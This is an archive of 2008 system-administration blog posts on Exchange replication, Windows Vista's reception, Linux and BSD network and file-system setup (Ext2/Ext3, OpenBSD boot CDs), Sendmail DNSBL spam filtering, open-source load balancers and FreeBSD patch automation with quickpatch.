If the target is a part of a cluster, it should be designated as a passive node on a failover cluster. The Mailbox Server role must be installed where no other clustered mailbox servers have been installed in the cluster.

SCR and Exchange backups

One last limitation is related to backups. Many organizations use CCR to make the backup process more efficient. Backups can be run against a CCR replica without affecting the primary mailbox server. But unlike cluster continuous replication, you can't run a backup against a standby continuous replication target. You can, however, use CCR on an SCR host. This allows you to create a CCR replica of the primary database, run your backups against this replica and still reap SCR's benefits.





Monday, October 6, 2008

The top five reasons why Windows Vista failed

On Friday, Microsoft gave computer makers a six-month extension for offering Windows XP on newly-shipped PCs. While this doesn’t impact enterprise IT — because volume licensing agreements will allow IT to keep installing Windows XP for many years to come — the move is another symbolic nail in Vista’s coffin.

The public reputation of Windows Vista is in shambles, as Microsoft itself tacitly acknowledged in its Mojave ad campaign.

IT departments are largely ignoring Vista. In June (18 months after Vista’s launch), Forrester Research reported that just 8.8% of enterprise PCs worldwide were running Vista. Meanwhile, Microsoft appears to have put Windows 7 on an accelerated schedule that could see it released in 2010. That will provide IT departments with all the justification they need to simply skip Vista and wait to eventually standardize on Windows 7 as the next OS for business.

So how did Vista get left holding the bag? Let’s look at the five most important reasons why Vista failed.

5. Apple successfully demonized Vista

Apple’s clever I’m a Mac ads have successfully driven home the perception that Windows Vista is buggy, boring, and difficult to use. After taking two years of merciless pummeling from Apple, Microsoft recently responded with it’s I’m a PC campaign in order to defend the honor of Windows. This will likely restore some mojo to the PC and Windows brands overall, but it’s too late to save Vista’s perception as a dud.

4. Windows XP is too entrenched

In 2001, when Windows XP was released, there were about 600 million computers in use worldwide. Over 80% of them were running Windows but it was split between two code bases: Windows 95/98 (65%) and Windows NT/2000 (26%), according to IDC. One of the big goals of Windows XP was to unite the Windows 9x and Windows NT code bases, and it eventually accomplished that.

In 2008, there are now over 1.1 billion PCs in use worldwide and over 70% of them are running Windows XP. That means almost 800 million computers are running XP, which makes it the most widely installed operating system of all time. That’s a lot of inertia to overcome, especially for IT departments that have consolidated their deployments and applications around Windows XP.

And, believe it or not, Windows XP could actually increase its market share over the next couple years. How? Low-cost netbooks and nettops are going to be flooding the market. While these inexpensive machines are powerful enough to provide a solid Internet experience for most users, they don’t have enough resources to run Windows Vista, so they all run either Windows XP or Linux. Intel expects this market to explode in the years ahead. (For more on netbooks and nettops, see this fact sheet and this presentation — both are PDFs from Intel.)

3. Vista is too slow

For years Microsoft has been criticized by developers and IT professionals for “software bloat” — adding so many changes and features to its programs that the code gets huge and unwieldy. However, this never seemed to have enough of an effect to impact software sales. With Windows Vista, software bloat appears to have finally caught up with Microsoft.

Vista has over 50 million lines of code. XP had 35 million when it was released, and since then it has grown to about 40 million. This software bloat has had the effect of slowing down Windows Vista, especially when it’s running on anything but the latest and fastest hardware. Even then, the latest version of Windows XP soundly outperforms the latest version of Microsoft Vista. No one wants to use a new computer that is slower than their old one.

2. There wasn’t supposed to be a Vista

It’s easy to forget that when Microsoft launched Windows XP it was actually trying to change its OS business model to move away from shrink-wrapped software and convert customers to software subscribers. That’s why it abandoned the naming convention of Windows 95, Windows 98, and Windows 2000, and instead chose Windows XP.

The XP stood for “experience” and was part of Microsoft’s .NET Web services strategy at the time. The master plan was to get users and businesses to pay a yearly subscription fee for the Windows experience — XP would essentially be the on-going product name but would include all software upgrades and updates, as long as you paid for your subscription. Of course, it would disable Windows on your PC if you didn’t pay. That’s why product activation was coupled with Windows XP.

Microsoft released Windows XP and Office XP simultaneously in 2001 and both included product activation and the plan to eventually migrate to subscription products. However, by the end of 2001 Microsoft had already abandoned the subscription concept with Office, and quickly returned to the shrink-wrapped business model and the old product development model with both products.

The idea of doing incremental releases and upgrades of its software — rather than a major shrink-wrapped release every 3-5 years — was a good concept. Microsoft just couldn’t figure out how to make the business model work, but instead of figuring out how to get it right, it took the easy route and went back to an old model that was simply not very well suited to the economic and technical realities of today’s IT world.

1. It broke too much stuff

One of the big reasons that Windows XP caught on was because it had the hardware, software, and driver compatibility of the Windows 9x line plus the stability and industrial strength of the Windows NT line. The compatibility issue was huge. Having a single, highly-compatible Windows platform simplified the computing experience for users, IT departments, and software and hardware vendors.

Microsoft either forgot or disregarded that fact when it released Windows Vista, because, despite a long beta period, a lot of existing software and hardware were not compatible with Vista when it was released in January 2007. Since many important programs and peripherals were unusable in Vista, that made it impossible for a lot of IT departments to adopt it. Many of the incompatibilities were the result of tighter security.

After Windows was targeted by a nasty string of viruses, worms, and malware in the early 2000s, Microsoft embarked on the Trustworthy Computing initiative to make its products more secure. One of the results was Windows XP Service Pack 2 (SP2), which won over IT and paved the way for XP to become the world’s mostly widely deployed OS.

The other big piece of Trustworthy Computing was the even-further-locked-down version of Windows that Microsoft released in Vista. This was definitely the most secure OS that Microsoft had ever released but the price was user-hostile features such as UAC, a far more complicated set of security prompts that accompanied many basic tasks, and a host of software incompatibility issues. In order words, Vista broke a lot of the things that users were used to doing in XP.

Bottom line

There are some who argue that Vista is actually more widely adopted than XP was at this stage after its release, and that it’s highly likely that Vista will eventually replace XP in the enterprise. I don’t agree. With XP, there were clear motivations to migrate: bring Windows 9x machines to a more stable and secure OS and bring Windows NT/2000 machines to an OS with much better hardware and software compatibility. And, you also had the advantage of consolidating all of those machines on a single OS in order to simplify support.

With Vista, there are simply no major incentives for IT to use it over XP. Security isn’t even that big of an issue because XP SP2 (and above) are solid and most IT departments have it locked down quite well. As I wrote in the article Prediction: Microsoft will leapfrog Vista, release Windows 7 early, and change its OS business, Microsoft needs to abandon the strategy of releasing a new OS every 3-5 years and simply stick with a single version of Windows and release updates, patches, and new features on a regular basis. Most IT departments are essentially already on a subscription model with Microsoft so the business strategy is already in place there.

As far as the subscription model goes for small businesses and consumers, instead of disabling Windows on a user’s PC if they don’t renew their subscription, just don’t allow that machine to get any more updates if they don’t renew. Microsoft could also work with OEMs to sell something like a three-year subscription to Windows with every a new PC. Then users would have the choice of renewing on their own after that.

Thursday, October 2, 2008

Setting up 2 IP address on "One" NIC (Redhat/Fedora)

STEP 1 (The settings for the initial IP address)
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0

DEVICE=eth0
BOOTPROTO=static
BROADCAST=192.168.1.255
IPADDR=192.168.1.1

NETMASK=255.255.255.0
NETWORK=192.168.1.0
ONBOOT=yes


STEP 2 (2nd IP address: )
$ cat /etc/sysconfig/network-scripts/ifcfg-eth0:1

DEVICE=eth0:1
BOOTPROTO=static
BROADCAST=192.168.1.255
IPADDR=192.168.1.2
NETMASK=255.255.255.0
NETWORK=192.168.1.0
ONBOOT=yes


Note, in STEP 1 the filename is “ifcfg-eth0″, whereas in STEP 2 it’s “ifcfg-eth0:1″ and also not the matching entries for “DEVICE=…”. Also, obviously, the “IPADDR” is different as well.

Tuesday, September 23, 2008

Custom OpenBSD 4.3 bootable CD

Strat from the release of OpenBSD 4.2, you will find that cdrom42.fs was not provided in OpenBSD official ftp sites. however, it is relatively easy to custom build your OpenBSD bootable installer CD. I will show you the steps in making your own OpenBSD bootable CD.

Create download directory.
shell> mkdir -p /OpenBSD

Download OPENBSD Files
shell> wget ftp://ftp.openbsd.org/pub/OpenBSD/4.3/i386/*

if the download is disconnected suddenly due to the Internet connection problem. You can resume it by
shell> wget -c ftp://ftp.openbsd.org/pub/OpenBSD/4.3/i386/*


Create Cdrom43.fs
A PERL module, call "geteltorito" need to use for grab a copy/make executable and extract boot image from the file cdemu43.iso with simple command.

shell > geteltorito cdemu43.iso > cdrom43.fs
Booting catalog starts at sector:29
Manufacturer of CD: Copyright (c) 2007 Theo
Image architecture: x86
Boot Media type is: 2.88meg floppy
E1 Torito image starts at sector 30 and has 5760 sector(s) of 512 Bytes
Image has been written to stdout.........

To Create Boot Image
shell> mkyhybrid -r -b cdrom43.fs -c "boot.catalog" -o OpenBSD43.iso OpenBSD

By now, you should already have the OpenBSD43.iso and you can burn it to CD using any kind of operating system.

After finished, you can create the bootable iso image:

Sunday, September 21, 2008

10 reasons to migrate from Windows 2003 server to Windows 2008 server

1. Windows Server 2008 offers a world-class Web and application platform designed to provide security and ease of management for developing and reliably hosting enterprise applications and services.
2. The platform offers improved networking performance to harness the power of today’s multigigabit networks and help IT organizations secure and control network traffic.
3. Every aspect of Windows Server 2008 is designed with enhanced security and strict compliance in mind. In action, Network Access Protection features help enforce policies designed to ensure that any computer connecting to the network meets corporate requirements for system health.
4. By migrating to Windows Server 2008 now, organization can maximize the OS cycle and take full advantage of the financial and technical benefits of powerful new functionality.
5. Windows Server 2008 provides outstanding control over remote infrastructure with enhancements to Microsoft Active Directory services, including read-only domain controllers and administrative role separations.
6. The platform provides simplified server management through the server manager console – a tool that helps streamline management of server configurations, status reporting, and role management.
7. Superior scripting and task automation enable IT organizations to automate common tasks and easily control system administration.
8. Windows Server 2008 supports presentation virtualization, enabling secure access to internal applications through firewall-friendly ports.
9. Hyper-V virtualization technology facilitates production server consolidations, fast disaster recovery, and simplified management of dynamic data centers.
10. Windows Server 2008 helps business leverage the power of the Windows Vista OS. The two platform share several networking, storage, security, and management technologies.

Wednesday, September 17, 2008

Monitor Proftpd Server by Using phpftpwho

Install phpftpwho

Note :- phpftpwho must be installed on the same machine that is running Proftpd server.

Download phpftpwho from here using the following command in apache web server root document folder (/var/www)

#wget http://www.rivetcode.com/files/phpftpwho/phpftpwho-1_05.tar.gz

Now you have tar.gz file you need to extract using the following command

# tar xzvf phpftpwho-1_05.tar.gz

Now you should be having phpftpwho folder in your apache root document folder(/var/www)

If you want to access your phpftpwho program you need to go to http://yourserverip/phpftpwho

Now you need to login into the ftp server and refresh your phpftpwho page you should see similar to the following screen

Monday, September 15, 2008

Spam filtering in sendmail by using DNSBL definitions

If you wish to be even more aggressive with your spam filtering, you can configure Sendmail to completely ignore senders that have bad reputations. With this step, Sendmail won’t even talk to them.

Editing the file /etc/mail/sendmail.mc, insert the following lines anywhere in the FEATURE section of the file:

dnl #
dnl # Here are Sharky's favorite DNSBL definitions.
dnl #
FEATURE(`dnsbl', `list.dsbl.org')dnl
FEATURE(`dnsbl', `bl.spamcop.net')dnl
FEATURE(`dnsbl', `sbl.spamhaus.org')dnl
FEATURE(`dnsbl', `blackholes.mail-abuse.org')dnl
FEATURE(`dnsbl', `relays.mail-abuse.org')dnl

Apply the changes by saving the file and running the following commands:

cd /etc/mail
make all
/sbin/service sendmail restart

From this point on, every time an SMTP client connects to Sendmail, Sendmail will refer to the blacklist authorities you added to verify the client’s reputation. If the client is reported to have a shady reputation, Sendmail will hang up on him.

Monday, September 8, 2008

Opensource load balancing Software

Linux Virtual Server
The Linux Virtual Server Project is a project to cluster many real servers together into a highly available, high-performance virtual server. The LVS load balancer handles connections from clients and passes them on the the real servers (so-called Layer 4 switching) and can virtualize almost any TCP or UDP service, like HTTP, HTTPS, NNTP, FTP, DNS, ssh, POP3, IMAP4, SMTP, etc. It is fully transparent to the client accessing the virtual service.
Homepage: http://www.LinuxVirtualServer.org/

BalanceNG
BalanceNG is a modern software IP load balancing solution. It is small, fast, and easy to use and setup. It offers session persistence, different distribution methods (Round Robin, Random, Weighted Random, Least Session, Least Bandwidth, Hash, Agent, and Randomized Agent) and a customizable UDP health check agent in source code. It supports VRRP to set up high availability configurations on multiple nodes. It supports SNMP, integrating the BALANCENG-MIB with Net-SNMPD. It implements a very fast in-memory IP-to-location database, allowing powerful location-based server load-balancing.
Homepage:http://www.inlab.de/balanceng/

HAproxy
HAproxy is a high-performance and highly-robust TCP and HTTP load balancer which provides cookie-based persistence, content-based switching, advanced traffic regulation with surge protection, automatic failover, run-time regex-based header control, Web-based reporting, advanced logging to help trouble-shooting buggy applications and/or networks, and a few other features. Its own event-driven state machine achieves 20,000 hits per second and surpasses GigaEthernet on modern hardware, even with tens of thousands of simultaneous connections.
Homepage:http://haproxy.1wt.eu/

Pen
Pen is a load balancer for "simple" TCP-based protocols such as HTTP or SMTP. It allows several servers to appear as one to the outside. It automatically detects servers that are down and distributes clients among the available servers. This gives high availability and scalable performance.
Homepage:http://siag.nu/pen/

Crossroads Load Balancer
Crossroads is a daemon running in user space, and features extensive configurability, polling of back ends using wake up calls, status reporting, many algorithms to select the 'right' back end for a request (and user-defined algorithms for very special cases), and much more. Crossroads is service-independent: it is usable for any TCP service, such as HTTP(S), SSH, SMTP, and database connections. In the case of HTTP balancing, Crossroads can provide session stickiness for back end processes that need sessions, but aren't session-aware of other back ends. Crossroads can be run as a stand-alone daemon or via inetd.
Homepage:http://crossroads.e-tunity.com/

balance
Balance is a simple but powerful generic TCP proxy with round-robin load balancing and failover mechanisms. Its behavior can be controlled at runtime using a simple command line syntax. Balance supports IPv6 on the listening side, which makes it a very useful tool for IPv6 migration of IPv4 only services and servers.
Homepage:http://www.inlab.de/balance.html

Distributor load balancer
Distributor is a software TCP load balancer. Like other load balancers, it accepts connections and distributes them to an array of back end servers. It is compatible with any standard TCP protocol (HTTP, LDAP, IMAP, etc.) and is also IPv6 compatible. It has many unique and advanced features and a high-performance architecture.
Homepage:http://distributor.sourceforge.net/

Pure Load Balancer
Pure Load Balancer is a high-performance software load balancer for the HTTP and SMTP protocols. It uses an asynchronous non-forking/non-blocking model, and provides fail-over abilities. When a backend server goes down, it automatically removes it from the server pool, and tries to bring it back to life later. Pure Load Balancer has full IPv6 support and works on OpenBSD, NetBSD, FreeBSD and Linux.
Homepage:http://plb.sunsite.dk/

Load Balancer Project
The Load Balancer Project is a tool that allows you to balance requests using clusters of servers. The goal is to achieve high availability load balancing with a simple configuration for the load balancer and the network topology. It leaves the servers untouched so the configuration only resides on the load balancer, and it allows you to manage any type of service via a plugin model design and a transparent proxy feature.
Homepage:http://www.jmcresearch.com/projects/loadbalancer/

mod_athena
mod_athena is an Apache-based application load balancer for large systems. It allows the HTTP server to act as a load balancer either internally to Apache's own mod_proxy (for reverse proxying), or externally to machines querying it. Arbitrary statistics are sent to the engine via a simple GET plus query-string interface, from which it will then make decisions based on chosen algorithms.
Homepage:http://ath.sourceforge.net/

udpbalancer
Udpbalancer is a reverse proxy that sorts UDP requests from your clients to your servers. It may operate in round-robin, volume balance, and load balance modes.
Homepage:http://dev.acts.hu/udpbalancer/

MultiLoad
MultiLoad is a load balancer that redirects HTTP requests to pre-defined servers/locations. It gives the provider a way to balance the traffic and hides the real download location. It allows you to manage different version of each download. It is also a load balancing server extension. You can distribute files on some servers so that a downloaded file can be loaded form different servers. These servers can have different priorities to control the active traffic.
Homepage:http://download.laukien.com

Sunday, September 7, 2008

Why qmail? - Comparison of qmail with other MTAs

I am just giving the comparison of qmail with sendmail which is being widely used as MTA for the past few decades.

Qmail is a light weight product, and unlike many other MTAs you don.t have to run qmail as root. This is one of the best security features of qmail.

Qmail is a much smaller than sendmail, and it lacks many of the features that most mail servers have today. It has no native support for RBL, which sendmail does have. Also, unlike sendmail, Qmail can’t reject E-mail addressed to a mailbox that doesn’t exist.

Qmail will accept the E-mail message, and then it will generate a "no such user" bounce internally. But these are the standard features of qmail, a large number of add-ons or patches are available, and by applying these add-ons or patches you can make the qmail more powerful than any other MTA.

Qmail.s security features are widely discussed and documented. Sendmail has been hacked, revised, and patched for years. Security vulnerabilities of sendmail is an established fact and well documented also.

One of the nice features of Qmail is that it supports an alternate mail storage format, that’s directory-based, instead of one huge file containing all your messages. If you do a lot of POP3 serving, you can save a lot of CPU cycles and disk activity with Qmail.

Unfortunately, Pine does not natively support this storage format. But, again, there are patches for that out there.

Qmail has a problem if you are sending mails to multiple users of the same domain; qmail will connect multiple times unlike sendmail. This may lead to the wastage of bandwidth.

Wednesday, September 3, 2008

Network visualization

The Interactive Network Active-traffic Visualization (INAV), is a monitoring tool that allows network administrators to monitor traffic on a local area network in real-time without overwhelming the administrator with extraneous data. The visualization tool can effectively perform a variety of tasks from passively mapping a LAN to identifying reoccurring trends over time.

Currently, INAV supports Ethernet, IP, TCP, UDP, and ICMP. INAV is implemented using a client-server architecture that allows multiple administrators to easily view network traffic from different vantage points across the network.

Once established, the INAV server passively sniffs data from the network and dynamically displays activity between different nodes on the network while keeping statistics on bandwidth usage.

The current state of the network is stored and broadcast to the different INAV clients. The INAV client uses an intuitive, lightweight graphical user interface that can easily change views and orient on specific clusters of nodes.

Once a node on the network is selected, the client highlights any node that has sent traffic to or from that location. The client receives the current state of the network with a variable refresh rate that is adjustable to limit INAV generated
Communications on the network. Installation of the tool is straight forward and its operation is very intuitive. The INAV server runs on any Linux operating system with root privileges, while the client was developed in Java and can be run on most operating systems.

You can download INAV at inav.scaparra.com and a detailed white paper is available at inav.scaparra.com/docs/whitePapers/INAV.pdf.

Sunday, August 24, 2008

Ext2 and Ext3

As mentioned previously, Ext2 was the de facto file system for Linux. Although Ext2 lacks some of the advanced features, such as extremely large files and extent mapped files of XFS, JFS, and others, it is a reliable, stable, and still available out-of-the-box file system for all Linux distributions. The real weakness of Ext2 is fsck: the bigger the Ext2 file system, the longer it takes fsck to run. Longer fsck times translate into longer down times.

Block Allocation in the Ext2 File System
When sequentially writing to a file, Ext2 preallocates space in units of eight contiguous blocks. Unused preallocation blocks are released when the file is closed, so space isn't wasted. This method prevents or reduces fragmentation, a condition under which many of the blocks in the file are spread throughout the disk because contiguous blocks aren't available. Contiguous blocks increase performance because when files are read sequentially there is minimal disk head movement.
Fragmentation of filesthat is, the scattering of files into blocks that are not contiguousis a problem that all file systems encounter. Fragmentation is caused when files are created and deleted. The fragmentation problem can be solved by having the file system use advanced algorithms to reduce fragmentation. The problem can also be solved by using the defrag file system utility, which moves the fragmented files so that they have contiguous blocks assigned to them. A defragmentation tool available for Ext2 is called defrag.ext2.
Creating an Ext2 File System
The program that creates Ext2 and (Ext3) file systems is called mke2fs. Two additional commands can be used to create an Ext2/Ext3 file system: mkfs.ext2 and mkfs t ext2. The rest of this section looks at some of the key options that are available with the mkfs command:
• The -b block-size option specifies the block size in bytes. Valid block size values are 1024, 2048, and 4096 bytes per block.
• The -N number-of-inodes option specifies the number of inodes.
• The -T fs-type option specifies how the file system will be used. The valid options are as follows:
news creates one inode per 4KB block.
largefile creates one inode per megabyte.
largefile4 creates one inode per 4 megabytes.
For a complete listing of the options to mkfs.ext2, see the mkfs.ext2 man page.
The following example uses the default when issuing mkfs on the device /dev/hdb2. The block size defaults to 4096, and the number of inodes created is 502944.
# mkfs.ext2 /dev/hdb2

mke2fs 1.32 (09-Nov-2002)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
502944 inodes, 1004062 blocks
...

Next, set the block size to 1024 with the b 1024 option, and set the file system type with the T news option. The number of inodes created is 1005568.
# mkfs -t ext2 -b 1024 -T news /dev/hdb2

mke2fs 1.32 (09-Nov-2002)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
1005568 inodes, 4016250 blocks
...

Ext3 Extensions for the Ext2 File System
The Ext3 file system provides higher availability without impacting the robustness (at least, the simplicity and reliability) of Ext2. Ext3 is a minimal extension to Ext2 to add support for journaling. Ext3 uses the same disk layout and data structures as Ext2, and it is forward- and backward-compatible with Ext2. Migrating from Ext2 to Ext3 (and vice versa) is quite easy; it can even be done in-place in the same partition. The other three journaling file systems require the partition to be formatted with their mkfs utility.
If you want to adopt a journaling file system but don't have free partitions on your system, Ext3 could be the journaling file system to use.
Kernel Configuration Support for Ext3
You can select Ext3 options from the File Systems section of the configuration menu and enable the following option:
Ext3 journaling file system support (CONFIG_EXT3_FS=y,m,n)

Click y next to the Ext3 entry if you want to build Ext3 into the kernel. Click m next to the Ext3 entry if you want to build Ext3 as a module. The n option is used if support for Ext3 is not needed.
Other options are available in the Ext3 selection for Ext3 configuration. If you need any of these options, select them here.
Working with Ext3
There are three ways to tune an Ext3 file system:
1. When the file system is created, which is the most efficient way
2. Through the tuning utility tune2fs, which can be used to tune the file system after it has been created
3. Through options that can be used when the file system is mounted
All three of these tuning options are discussed in the next sections.
Creating an Ext3 Partition
The program that creates Ext3 file systems is called mke2fs. You can also use the mkfs.ext3 and mkfs t ext3 commands to create an Ext3 file system. The rest of this section looks at some of the key options that are available with the mkfs command:
• The -b block-size option specifies the block size in bytes. Valid block size values are 1024, 2048, and 4096 bytes per block.
• The -N number-of-inodes option specifies the number of inodes.
• The -T fs-type option specifies how the file system will be used. The valid options are as follows:
news creates one inode per 4KB block.
largefile creates one inode per megabyte.
largefile4 creates one inode per 4 megabytes.
For a complete listing of the options to mkfs.ext3, see the mkfs.ext3 man page.
The following example uses the default when issuing mkfs on the device /dev/sdb1. The block size is 1024, and the number of inodes created is 128016.
# mkfs.ext3 /dev/sdb1

mke2fs 1.28 (31-Aug-2002)
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
128016 inodes, 511984 blocks
...

After the Ext3 file system is formatted, it is good practice to eliminate the automatic checking of the file system (the file system is automatically checked every 23 mounts or 180 days, whichever comes first). To eliminate the automatic checking, use the tune2fs command with the c option to set checking to 0.
# tune2fs c 0 /dev/sdb1

tune2fs 1.28(31-Aug-2002)
Setting maximal mount count to -1

Converting an Ext2 File System to Ext3
This section explains how to convert an Ext2 file system to Ext3:
1. Make a backup of the file system.
2. Add a journal file to the existing Ext2 file system you want to convert by running the tune2fs program with the -j option. You can run tune2fs on a mounted or unmounted Ext2 file system. For example, if /dev/hdb3 is an Ext2 file system, the following command creates the log:
3. # tune2fs -j /dev/hdb3

If the file system is mounted, a journal file named .journal is placed in the root directory of the file system. If the file system is not mounted, the journal file is hidden. (When you mount an Ext3 file system, the .journal file appears. The .journal file can indicate that the file system is indeed of type Ext3.)
4. Change the entry for /dev/hdb3 in the /etc/fstab file from ext2 to ext3.
5. Reboot and verify that the /dev/hdb3 partition has type Ext3 by typing mount and examining the output. The output should include an entry like the following:
6. # mount
7.
8. /dev/hdb3 on /test type ext3 (rw)

Using a Separate Journal Device on an Ext3 File System
The first thing you need to do to use an external journal for an Ext3 file system is to issue the mkfs command on the journal device. The block size of the external journal must be the same block size as the Ext3 file system. In the following example, the /dev/hda1 device is used as the external log for the Ext3 file system:
# mkfs.ext3 -b 4096 -O journal_dev /dev/hda1

# mkfs.ext3 -b 4096 -J device=/dev/hda1 /dev/hdb1

Ext2/Ext3 Utilities
The e2fsprogs package contains various utilities for use with Ext2 and Ext3 file systems. The following is a short description of each utility:
• badblocks. Searches for bad blocks on a device.
• chattr. Changes the file attributes on an Ext2 or Ext3 file system.
• compile_et. Converts a table, listing error-code names and associated messages into a C-source file that is suitable for use with the com_err library.
• debugfs. A file system debugger for examining and changing the state of an Ext2 file system.
• dumpe2fs. Prints the super block and blocks group information for the file system present on a specified device.
• e2fsck and fsck.ext2. Checks, and optionally repairs, an Ext2 file system.
• e2image. Saves critical Ext2 file system data to a file.
• e2label. Displays or changes the file system label on the Ext2 file system.
• fsck.ext3. Checks, and optionally repairs, an Ext3 file system.
• lsattr. Lists the file attributes on an Ext2 file system.
• mk_cmds. Takes a command table file as input and produces a C-source file as output, which is intended for use with the subsystem library, libss.
• mke2fs. Creates an Ext2 file system. mkfs.ext2 is the same as mke2fs.
• mkfs.ext3. Creates an Ext3 file system.
• mklost+found. Creates a lost+found directory in the current working directory on an Ext2 file system. mklost+found preallocates disk blocks to the directory to make it usable by e2fsck.
• resize2fs. Resizes Ext2 file systems.
• tune2fs. Adjusts tunable file system parameters on an Ext2 file system.

Wednesday, August 20, 2008

FreeBSD: Automate Security Patches

Keep up-to-date with security patches.
We all know that keeping up-to-date with security patches is important. The trick is coming up with a workable plan that ensures you're aware of new patches as they're released, as well as the steps required to apply those patches correctly.
Michael Vince created quickpatch to assist in this process. It allows you to automate the portions of the patching process you'd like to automate and manually perform the steps you prefer to do yourself.
Preparing the Script
quickpatch requires a few dependencies: perl, cvsup, and wget. Use which to determine if you already have these installed on your system:
% which perl cvsup wget

/usr/bin/perl

/usr/local/bin/cvsup

wget: Command not found.

Install any missing dependencies via the appropriate port (/usr/ports/lang/perl5, /usr/ports/net/cvsup-without-gui, and /usr/ports/ftp/wget, respectively).
Once you have the dependencies, download the script from http://roq.com/projects/quickpatch and untar it:
% tar xzvf quickpatch.tar.gz

This will produce an executable Perl script named quickpatch.pl. Open this script in your favorite editor and review the first two screens of comments, up to the #Stuff you probably don't want to change line.
Make sure that the $release line matches the tag you're using in your cvs-supfile
# The release plus security patches branch for FreeBSD that you are

# following in cvsup.

# It should always be a long the lines of RELENG_X_X , example RELENG_4_9

$release='RELENG_4_9';

The next few paths are fine as they are, unless you have a particular reason to change them:
# Ftp server mirror from where to fetch FreeBSD security advisories

$ftpserver="ftp.freebsd.org";

# Path to store patcher program files

$patchdir="/usr/src/";

# Path to store FreeBSD security advisories

$advdir="/var/db/advisories/";

$advdirtmp="$advdir"."tmp/";

If you're planning on applying the patches manually and, when required, rebuilding your kernel yourself, leave the next section as is. If you're brave enough to automate the works, make sure that the following paths accurately reflect your kernel configuration file and build directories:
# Path to your kernel rebuild script for source patches that require kernel

#rebuild

$kernelbuild="/usr/src/buildkernel";

#$kernelbuild="cd /usr/src ; make buildkernel KERNCONF=GENERIC && make

#installkernel KERNCONF=GENERIC ; reboot";

# Path to your system recompile scipt for patches that require full

# operating system recompile

$buildworld="/usr/src/buildworld";

#$buildworld="cd /usr/src/ ; make buildworld && make installworld ; reboot";

#Run patch command after creation, default no

$runpatchfile="0";

# Minimum advisory age in hours. This is to make sure you don't patch

# before your local cvsup server has had a

# chance to recieve the source change update to your branch, in hours

$advisory_age="24";

Review the email accounts so the appropriate account receives notifications:
# Notify email accounts, eg: qw(billg@microsoft.com root@localhost);

@emails = qw(root);

Running the Hack
Run the script without any arguments to see the available options:
# /.quickpatch.pl

# Directory /var/db/advisories/ does not exist, creating

# Directory /var/db/advisories/tmp/ does not exist, creating

Quickpatch - Easy source based security update system

"./quickpatch.pl updateadv" to download / update advisories db

"./quickpatch.pl patch" or "./quickpatch.pl patch > big_patch_file" to

create patch files

"./quickpatch.pl notify" does not do anything but email you commands of what

it would do

"./quickpatch.pl pgpcheck" to PGP check advisories

Before applying any patches, it needs to know which patches exist. Start by downloading the advisories:
# ./quickpatch.pl updateadv

This will connect to ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories and download all of the advisories to /var/db/advisories. The first time you use this command, it will take a while. However, once you have a copy of the advisories, it takes only a second or so to compare your copies with the FTP site and, if necessary, download any new advisories.
After downloading the advisories, see if your system needs patching:
# ./quickpatch.pl notify

#

If the system is fully patched, you'll receive your prompt back. However, if the system is behind in patches, you'll see output similar to this:
# ./quickpatch.pl notify

######################################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /var/db/advisories/tmp/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 20/2/2004 11:57:30

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 382

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

and reboot the

system.

/usr/src/buildkernel

## Emailed root

It looks like this system needs to be patched against the "schmat reference counting bug." While running in notify mode, quickpatch emails this information to the configured address but neither creates nor installs the patch.
To create the patch, use:
# ./quickpatch.pl patch

#########################################################

####### FreeBSD-SA-04%3A02.shmat.asc

####### Stored in file /usr/src/FreeBSD-SA-04%3A02.shmat

####### Topic: shmat reference counting bug

####### Hostname: genisis - 21/2/2004 10:41:54

####### Date Corrected: 2004-02-04 18:01:10

####### Hours past since corrected: 405

####### Patch Commands

cd /usr/src

# patch < /path/to/patch

### c) Recompile your kernel as described in

# and reboot the

#system.

/usr/src/buildkernel



# file /usr/src/FreeBSD-SA-04%3A02.shmat

/usr/src/FreeBSD-SA-04%3A02.shmat: Bourne shell script text executable

This mode creates the patch as a Bourne script and stores it in /usr/src. However, it is up to you to apply the patch manually. This may suit your purposes if you intend to review the patch and read any notes or caveats associated with the actual advisory.
Automating the Process
One of the advantages of having a script is that you can schedule its execution with cron. Here is an example of a typical cron configuration for quickpatch.pl; modify to suit your own purposes. Remember to create your logging directories and touch your log files before the first run.
# Every Mon, Wed, and Fri at 3:05 do an advisory check and download any

# newly released security advisories

5 3 * * 1,3,5 root /etc/scripts/quickpatch.pl updateadv > \

/var/log/quickpatch/update.log 2>1



# 20 minutes later, check to see if any new advisories are ready for use

# and email the patch commands to the configured email address

25 3 * * 1,3,5 root /etc/scripts/quickpatch.pl notify >> \

/var/log/quickpatch/notify.log 2>&1



# 24 hours later patch mode is run which will run the patch commands if

# no one has decided to interfere.

25 3 * * 2,4,6 root /etc/scripts/quickpatch.pl patch >> \

/var/log/quickpatch/patch.log 2>&1
 
Custom Search